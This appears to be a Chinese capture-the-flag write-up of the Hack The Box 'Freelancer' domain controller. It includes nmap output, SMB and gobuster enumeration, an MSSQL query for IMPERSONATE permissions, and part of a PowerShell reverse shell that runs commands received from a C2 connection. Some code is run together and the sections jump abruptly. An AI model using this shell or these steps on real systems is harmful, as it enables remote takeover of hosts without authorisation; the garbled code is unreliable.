Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 19:20 CST Warning: 10.10.11.5 giving up on port because retransmission cap hit (10). sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.5, 16) => Operation not permitted Offending packet: TCP 10.10.16.4:35511 > 10.10.11.5:8189 S ttl=44 id=31021 iplen=44 seq=2972970908 win=1024 <mss 1460> Nmap scan report for 10.10.11.5 Host is up (0.83s latency). Not shown: 59837 closed tcp ports (reset), 5672 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http nginx 1.25.5 |_http-title: Did not follow redirect to http://freelancer.htb/ |_http-server-header: nginx/1.25.5 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-30 16:21:28Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49683/tcp open msrpc Microsoft Windows RPC 49704/tcp open msrpc Microsoft Windows RPC 55297/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-info: | 10.10.11.5\SQLEXPRESS: | Instance name: SQLEXPRESS | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false | TCP port: 55297 | Named pipe: \\10.10.11.5\pipe\MSSQL$SQLEXPRESS\sql\query |_ Clustered: false | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-10-30T16:19:02 |_Not valid after: 2054-10-30T16:19:02 | ms-sql-ntlm-info: | 10.10.11.5\SQLEXPRESS: | Target_Name: FREELANCER | NetBIOS_Domain_Name: FREELANCER | NetBIOS_Computer_Name: DC | DNS_Domain_Name: freelancer.htb | DNS_Computer_Name: DC.freelancer.htb | DNS_Tree_Name: freelancer.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2024-10-30T16:23:30+00:00; +5h00m04s from scanner time. Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|Vista|10|2012|Longhorn|7|8.1|2016|11 (94%) OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_8 Aggressive OS guesses: Microsoft Windows Server 2019 (94%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 10 1709 - 1909 (91%), Microsoft Windows Server 2012 (91%), Microsoft Windows 10 2004 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows Server 2012 or Server 2012 R2 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 1720/tcp) HOP RTT ADDRESS 1 689.59 ms 10.10.16.1 2 366.60 ms 10.10.11.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 196.91 seconds
开放若干端口,可以看到这是一台域控,根据80端口的结果,可以发现域名freelancer.htb,将其添加到/etc/hosts中,同时存在SQL Server
SMB
1
smbclient -L //10.10.11.5
smb没有重要信息
80端口
扫描一下目录
1
gobuster dir -u http://freelancer.htb/ -w /usr/share/wordlists/dirb/common.txt -t 5
SELECTdistinct b.name FROM sys.server_permissions a INNERJOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name ='IMPERSONATE';
# Writes a string to C2 functionWriteToStream($String) { # Create buffer to be used for next network stream read. Size is determined by the TCP client recieve buffer (65536 by default) [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
# Write to C2 $StreamWriter.Write($String + 'SHELL> ') $StreamWriter.Flush() }
# Initial output to C2. The function also creates the inital empty byte array buffer used below. WriteToStream ''
# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed. while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt0) { # Encode command, remove last byte/newline $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1) # Execute command and save output (including errors thrown) $Output = try { Invoke-Expression$Command2>&1 | Out-String } catch { $_ | Out-String }
# Write output to C2 WriteToStream ($Output) } # Closes the StreamWriter and the underlying TCPClient $StreamWriter.Close()